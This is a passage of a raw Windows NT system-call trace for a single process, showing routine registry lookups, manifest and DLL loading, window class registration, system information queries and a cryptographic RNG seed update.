 00375   456   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... -2147482028, ) }, ... -2147482028, ) == 0x0
 00376   456   NtOpenKey  (0x80000000, {24, 0, 0x240, 0, 0,  (0x80000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00377   456   NtOpenKey  (0x80000000, {24, -2147482028, 0x640, 0, 0,  (0x80000000, {24, -2147482028, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482020, ) }, ... -2147482020, ) == 0x0
 00378   456   NtQueryValueKey  (-2147482020,  (-2147482020, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00379   456   NtClose  (-2147482020, ... ) == 0x0
 00380   456   NtClose  (-2147482028, ... ) == 0x0
 00370   456   NtQueryDefaultUILanguage  ... ) == 0x0
 00381   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00382   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1238220, ... ) }, 1238220, ... ) == 0x0
 00383   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 5, 96, ... 56, {status=0x0, info=1}, ) }, 5, 96, ... 56, {status=0x0, info=1}, ) == 0x0
 00384   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 56, ... 64, ) == 0x0
 00385   456   NtClose  (56, ... ) == 0x0
 00386   456   NtMapViewOfSection  (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x880000), 0x0, 4096, ) == 0x0
 00387   456   NtClose  (64, ... ) == 0x0
 00388   456   NtUnmapViewOfSection  (-1, 0x880000, ... ) == 0x0
 00389   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1237860, ... ) }, 1237860, ... ) == 0x0
 00390   456   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1238560,  (0x80100080, {24, 0, 0x40, 0, 1238560, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 0x0, 0, 5, 1, 96, 0, 0, ... 64, {status=0x0, info=1}, ) }, 0x0, 0, 5, 1, 96, 0, 0, ... 64, {status=0x0, info=1}, ) == 0x0
 00391   456   NtCreateSection  (0xf0005, 0x0, 0x0, 2, 134217728, 64, ... 56, ) == 0x0
 00392   456   NtClose  (64, ... ) == 0x0
 00393   456   NtMapViewOfSection  (56, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0x880000), {0, 0}, 4096, ) == 0x0
 00394   456   NtClose  (56, ... ) == 0x0
 00395   456   NtUnmapViewOfSection  (-1, 0x880000, ... ) == 0x0
 00396   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1, 96, ... 56, {status=0x0, info=1}, ) }, 1, 96, ... 56, {status=0x0, info=1}, ) == 0x0
 00397   456   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 56, ... 64, ) == 0x0
 00398   456   NtMapViewOfSection  (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x880000), 0x0, 4096, ) == 0x0
 00399   456   NtQueryInformationFile  (56, 1238180, 56, NetworkOpen, ... {status=0x0, info=56}, ) == 0x0
 00400   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00401   456   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 1238260, 1, 96, 0}  (24, {128, 156, new_msg, 0, 1238260, 1, 96, 0} "\210\6\31\1\33\0\1\0\240\315Z\371\2209\307\1\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\18\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0\364\353\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1511, 0} "h\334\26\0\33\0\1\0\0\0\0\0\2209\307\1\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\18\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0\364\353\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 452, 456, 1511, 0}  (24, {128, 156, new_msg, 0, 1238260, 1, 96, 0} "\210\6\31\1\33\0\1\0\240\315Z\371\2209\307\1\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\18\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0\364\353\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1511, 0} "h\334\26\0\33\0\1\0\0\0\0\0\2209\307\1\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\18\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0\364\353\22\0\0\0\0\0" )  ) == 0x0
 00402   456   NtClose  (56, ... ) == 0x0
 00403   456   NtClose  (64, ... ) == 0x0
 00404   456   NtUnmapViewOfSection  (-1, 0x880000, ... ) == 0x0
 00405   456   NtUnmapViewOfSection  (-1, 0x12ebf4, ... ) == STATUS_NOT_MAPPED_VIEW
 00406   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00407   456   NtUserRegisterWindowMessage  ( ("ShellGetDragImage", ... ) , ... ) == 0xc03a
 00408   456   NtUserSystemParametersInfo  (104, 0, 1906151468, 0, ... ) == 0x1
 00409   456   NtUserGetDC  (0, ... ) == 0x1010051
 00410   456   NtUserCallOneParam  (16842833, 56, ... ) == 0x1
 00411   456   NtUserSystemParametersInfo  (38, 4, 1906153440, 0, ... ) == 0x1
 00412   456   NtUserSystemParametersInfo  (66, 12, 1240672, 0, ... ) == 0x1
 00413   456   NtOpenProcessToken  (-1, 0x8, ... 64, ) == 0x0
 00414   456   NtAccessCheck  (1329728, 64, 0x1, 1240076, 1240020, 56, 1240104, ... ) == STATUS_NO_IMPERSONATION_TOKEN
 00415   456   NtClose  (64, ... ) == 0x0
 00416   456   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Control Panel\Desktop"}, ... 64, ) }, ... 64, ) == 0x0
 00417   456   NtQueryValueKey  (64,  (64, "SmoothScroll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00418   456   NtClose  (64, ... ) == 0x0
 00419   456   NtUserSystemParametersInfo  (41, 500, 1240172, 0, ... ) == 0x1
 00420   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"}, ... 64, ) }, ... 64, ) == 0x0
 00421   456   NtQueryValueKey  (64,  (64, "EnableBalloonTips", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00422   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"}, ... 56, ) }, ... 56, ) == 0x0
 00423   456   NtQueryValueKey  (56,  (56, "EnableBalloonTips", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00424   456   NtClose  (56, ... ) == 0x0
 00425   456   NtClose  (64, ... ) == 0x0
 00426   456   NtUserSystemParametersInfo  (102, 0, 1906153328, 0, ... ) == 0x1
 00427   456   NtUserSystemParametersInfo  (4130, 0, 1240696, 0, ... ) == 0x1
 00428   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\LanguagePack"}, ... 64, ) }, ... 64, ) == 0x0
 00429   456   NtEnumerateValueKey  (64, 0, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 00430   456   NtClose  (64, ... ) == 0x0
 00431   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00432   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc03b
 00433   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc03d
 00434   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10011
 00435   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc03f
 00436   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00437   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc041
 00438   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00439   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ...
 00440   456   NtAllocateVirtualMemory  (-1, 5668864, 0, 4096, 4096, 32, ... 5668864, 4096, ) == 0x0
 00439   456   NtUserRegisterClassExWOW  ... ) == 0x810dc043
 00441   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc045
 00442   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00443   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc047
 00444   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10011
 00445   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc049
 00446   456   NtUserGetClassInfo  (1905590272, 1240592, 1240544, 1240620, 0, ... ) == 0xc049
 00447   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00448   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc04b
 00449   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00450   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc04d
 00451   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00452   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc04f
 00453   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc051
 00454   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00455   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc053
 00456   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10011
 00457   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc055
 00458   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc057
 00459   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00460   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc059
 00461   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10013
 00462   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc05b
 00463   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00464   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc05d
 00465   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00466   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc05f
 00467   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10011
 00468   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc017
 00469   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10011
 00470   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc019
 00471   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10013
 00472   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc018
 00473   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00474   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc01a
 00475   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10011
 00476   456   NtUserRegisterClassExWOW  (1240428, 1240508, 1240492, 1240524, 0, 384, 0, ... ) == 0x810dc01c
 00477   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00478   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc01e
 00479   456   NtUserFindExistingCursorIcon  (1239976, 1239992, 1240560, ... ) == 0x10011
 00480   456   NtUserRegisterClassExWOW  (1240488, 1240568, 1240552, 1240584, 0, 384, 0, ... ) == 0x810dc01b
 00481   456   NtUserFindExistingCursorIcon  (1239972, 1239988, 1240556, ... ) == 0x10011
 00482   456   NtUserRegisterClassExWOW  (1240484, 1240564, 1240548, 1240580, 0, 384, 0, ... ) == 0x810dc068
 00483   456   NtUserFindExistingCursorIcon  (1239980, 1239996, 1240564, ... ) == 0x10011
 00484   456   NtUserRegisterClassExWOW  (1240432, 1240512, 1240496, 1240528, 0, 384, 0, ... ) == 0x810dc06a
 00485   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc03b
 00486   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc03d
 00487   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc03f
 00488   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc041
 00489   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc043
 00490   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc045
 00491   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc047
 00492   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc049
 00493   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc04b
 00494   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc04d
 00495   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc04f
 00496   456   NtUserGetClassInfo  (1999896576, 1243496, 1243448, 1243524, 0, ... ) == 0xc051
 00497   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc053
 00498   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc055
 00499   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc059
 00500   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc05b
 00501   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc05d
 00502   456   NtUserGetClassInfo  (1999896576, 1243492, 1243444, 1243520, 0, ... ) == 0xc05f
 00503   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00504   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00505   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Control\Session Manager"}, ... 64, ) }, ... 64, ) == 0x0
 00506   456   NtQueryValueKey  (64,  (64, "CriticalSectionTimeout", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\215'\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (64, "CriticalSectionTimeout", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\215'\0"}, 16, ) }, 16, ) == 0x0
 00507   456   NtClose  (64, ... ) == 0x0
 00508   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00509   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00510   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00511   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00512   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\Interface"}, ... 64, ) }, ... 64, ) == 0x0
 00513   456   NtQueryValueKey  (64,  (64, "InterfaceHelperDisableAll", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00514   456   NtQueryValueKey  (64,  (64, "InterfaceHelperDisableAllForOle32", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00515   456   NtQueryValueKey  (64,  (64, "InterfaceHelperDisableTypeLib", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00516   456   NtClose  (64, ... ) == 0x0
 00517   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\Interface\{00020400-0000-0000-C000-000000000046}"}, ... 64, ) }, ... 64, ) == 0x0
 00518   456   NtQueryValueKey  (64,  (64, "InterfaceHelperDisableAll", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00519   456   NtQueryValueKey  (64,  (64, "InterfaceHelperDisableAllForOle32", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00520   456   NtClose  (64, ... ) == 0x0
 00521   456   NtOpenDirectoryObject  (0x2000f, {24, 0, 0x40, 0, 0,  (0x2000f, {24, 0, 0x40, 0, 0, "\BaseNamedObjects"}, ... 64, ) }, ... 64, ) == 0x0
 00522   456   NtOpenEvent  (0x1f0003, {24, 64, 0x0, 0, 0,  (0x1f0003, {24, 64, 0x0, 0, 0, "HookSwitchHookEnabledEvent"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00523   456   NtTestAlert  (... ) == 0x0
 00524   456   NtContinue  (1244464, 1, ...
 00525   456   NtSetInformationThread  (-2, Win32StartAddress(LpcReceivedMessageId), {StartAddress(LpcReceivedMsgId)=0x403e1c,}, 4, ... ) == 0x0
 00526   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\rpcss.dll"}, 1242644, ... ) }, 1242644, ... ) == 0x0
 00527   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\rpcss.dll"}, 5, 96, ... 56, {status=0x0, info=1}, ) }, 5, 96, ... 56, {status=0x0, info=1}, ) == 0x0
 00528   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 56, ... 68, ) == 0x0
 00529   456   NtClose  (56, ... ) == 0x0
 00530   456   NtMapViewOfSection  (68, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x8a0000), 0x0, 262144, ) == 0x0
 00531   456   NtClose  (68, ... ) == 0x0
 00532   456   NtUnmapViewOfSection  (-1, 0x8a0000, ... ) == 0x0
 00533   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00534   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00535   456   NtAllocateVirtualMemory  (-1, 1331200, 0, 4096, 4096, 4, ... 1331200, 4096, ) == 0x0
 00536   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00537   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\Device\KsecDD"}, 7, 16, ... 68, {status=0x0, info=0}, ) }, 7, 16, ... 68, {status=0x0, info=0}, ) == 0x0
 00538   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220J\311\201\242P\331\323\373N\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00539   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00540   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00541   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00542   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00543   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00544   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00545   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00546   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00547   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "\3000G|\320&7\250\3269@\331\224*X\215\333\4\311\317N\231\313\242_\334\32\227M*"\323\2308Zo\204\266L\354\242W2\12\344\373\241\264\215\227x\\351@\203v\350\312\266\37i\264\272\322\301\3110\35U\217\377\2714\351m_\377\360q", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "\3000G|\320&7\250\3269@\331\224*X\215\333\4\311\317N\231\313\242_\334\32\227M*"\323\2308Zo\204\266L\354\242W2\12\344\373\241\264\215\227x\\351@\203v\350\312\266\37i\264\272\322\301\3110\35U\217\377\2714\351m_\377\360q", 80, ... ) \323\2308Zo\204\266L\354\242W2\12\344\373\241\264\215\227x\\351@\203v\350\312\266\37i\264\272\322\301\3110\35U\217\377\2714\351m_\377\360q", 80, ... ) == 0x0
 00548   456   NtClose  (-2147482028, ... ) == 0x0
 00538   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "\234\324v\317n\371\10\265Y\265\245&|\2070\226qVa\304\376\321\273\221\362IG\232\354\3477\364\376\235d\264m\364f\222\362\276!\245\276\245\2c/\335\225qF\316\372\255\207\316\346\263\257\253\357\307\262\207Nn\205S\321\206#\31\337\275G7$\260\325C?y\13\264\213\11\234\230\203\304\13\323\177\320\316\306\177\215\255r\302\332\5\350S|xz\11\26\260y\322y\262=\262\267:\232\316\354\3549_\244bje\333t\225\353N\211j\245\236U\224q\25\334\16\245h5\27MI\244\255\260\246fl\311&\227N!\367\360\302\316\2Xj\207\376\270\242\362\25\316\246\370d\234\345-\243\254\275\342|D\301\3\351\224w%K\321\314\2\3200\373[*R\332e\217\243\316\325!e\271\354p\360I\221\1\357\327\230\235^\27&\325\37\124\373\346\7\207W\212\244\226\7\342\343\215xYi]\202\324\233'\326\375\15r\321", ) , ) == 0x0
 00549   456   NtAllocateVirtualMemory  (-1, 1335296, 0, 16384, 4096, 4, ... 1335296, 16384, ) == 0x0
 00550   456   NtUserRegisterClassExWOW  (1244728, 1244808, 1244792, 1244824, 0, 384, 0, ... ) == 0x810dc038
 00551   456   NtUserGetAtomName  (49208, 1243492, ... ) == 0x15
 00552   456   NtUserCreateWindowEx  (0, 49208, 49208,  (0, 49208, 49208, "OleMainThreadWndName", -2013265920, -2147483648, -2147483648, -2147483648, -2147483648, -3, 0, 1998258176, 0, 1073742848, 0, ... , -2013265920, -2147483648, -2147483648, -2147483648, -2147483648, -3, 0, 1998258176, 0, 1073742848, 0, ...
 00553   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1241016, ... ) }, 1241016, ... ) == 0x0
 00554   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 5, 96, ... 56, {status=0x0, info=1}, ) }, 5, 96, ... 56, {status=0x0, info=1}, ) == 0x0
